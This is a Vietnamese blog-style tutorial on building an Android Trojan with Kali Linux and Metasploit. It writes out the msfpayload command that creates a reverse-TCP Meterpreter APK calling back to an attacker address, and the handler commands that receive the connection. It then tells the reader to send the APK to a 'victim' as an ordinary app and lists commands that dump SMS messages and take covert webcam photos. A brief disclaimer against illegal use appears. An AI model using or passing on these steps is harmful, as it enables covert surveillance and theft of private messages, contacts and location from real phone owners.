Hướng dẫn Hack điện thoại Android bằng Virus (Trojan) trên Kali
Smartphone là thiết bị không thể thiếu trong cuộc sống hiện nay, nó chiếm gần hết thời gian của mọi người, đồng nghĩa với việc Hacker có thể dễ dàng lợi dụng thói quen người dùng hàng ngày để gửi Virusvà xâm chiếm chiếc điện thoại của bạn. Trong bài này, mình sẽ giúp các bạn tạo ra 1 con Virus (Trojan)rất đơn giản và có thể xâm nhập vào bất cứ điện thoại chạy android nào. Mình đã test và chạy ok trênNote 2, Note 4.
Điển hình một vài công dụng của con virus này:
- Lấy được toàn bộ thông tin tin nhắn, danh bạ, cuộc gọi của nạn nhân
- Biết được vị trí hiện tại của nạn nhân
- Chụp hình điện thoại không cần mở màn hình điện thoại
Và còn rất nhiều tính năng khác mà bạn không ngờ tới được.
Dù con virus này chỉ ở dạng basic nhưng bạn thấy đấy, vẫn làm được nhiều thứ hữu ích hơn chúng ta tưởng.
Cần có: kiến thức cơ bản về Network, Linux
OS: Kali 1.1.0
Giới thiệu vậy là đủ rồi nhỉ, giờ bắt tay vào làm thôi, à mà khoan vẫn phải nhắc lại mục đích trong mỗi bài viết…^^
Bài viết chia sẻ cho anh em đam mê công nghệ, dùng vọc phá thêm cho biết kinh nghiệm, không khuyến khích dùng vào việc làm trái pháp luật nha các bạn.
Thôi, vào việc chính, đầu tiên chúng ta phải chạy trên Kali mới nhất để được nhiều tính năng mới.
Một số lưu ý: khi bạn tạo 1 new vitural mới trong Vmware, bạn nhớ chọn hệ điều hành Debian 6. Vì nếu bạn chọn nhầm OS khác thì khi install Kali, nó sẽ báo lỗi Network Config.
Trong bài này mình chạy ở localhost, muốn ra internet thì cứ xài IP Public và NAT port trên router là được nhé.
Sau khi cài đặt Kali trên Vmware thành công và đăng nhập vào chế độ đồ họa, chúng ta bật Terminal lên và chạy những câu lệnh quen thuộc sau đây (mình sẽ không giải thích vì các bạn đã có kiến thức linux và network thì đọc chắc chắn sẽ hiểu):
Câu lệnh đầu tiên dùng tạo ra 1 phần mềm chưa virus với tên mrlonely909.apk ra Desktop:
msfpayload android/meterpreter/reverse_tcp LHOST=192.168.1.9 LPORT=443 R > mrlonely909.apk
Tiếp theo chạy lệnh:
Msfconsole
Sau khi nó vào chế độ Msf thì chạy tiếp các lệnh sau:
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 192.168.1.9
set lport 443
exploit
Sau khi chạy lệnh exploit, chúng ta chỉ việc gửi file mrlonely.apk cho nạn nhân, nó sẽ được cài đặt như một ứng dụng bình thường, khi nạn nhân chạy ứng dụng thì tự động nó sẽ kết nối tới server của ta đang chạy.
Ở đây mình đã gửi file mrlonely909.apk vào chiếc note 2 của mình
Khi cài đặt phần file này, nó sẽ thông báo đây giống hình dưới đây, cứ việc next và setup.
Sau khi cài đặt, ta mở file đó, thì lập tức bên server sẽ nhận được kết nối ngay
Sau khi kết nối, ta bắt đầu vọc phá thôi, ở đây mình sẽ demo 1 số lệnh như
Sysinfo – xem hệ thống
Dump_sms – Lấy toàn bộ nội dung sms
Webcam_snap – Chụp hình bằng wc
Help – Xem tất cả các lệnh cần thiết
Còn lại các bạn vọc phá tiếp nhé, mình xin nhắc lại là mình không phải hacker gì cả và rất mong các bạn đừng sử dụng những kiến thức này vào việc không tốt, gây ảnh hưởng tới người khác. Mục đích của mình là chia sẻ kiến thức dùng để vọc phá cho thỏa đam mê thôi.
Chúc các bạn thành công, mọi thắc mắc hay khó khăn có thể liên hệ mình, mình sẽ cố gắng hỗ trợ trong kiến thức có hạn của mình.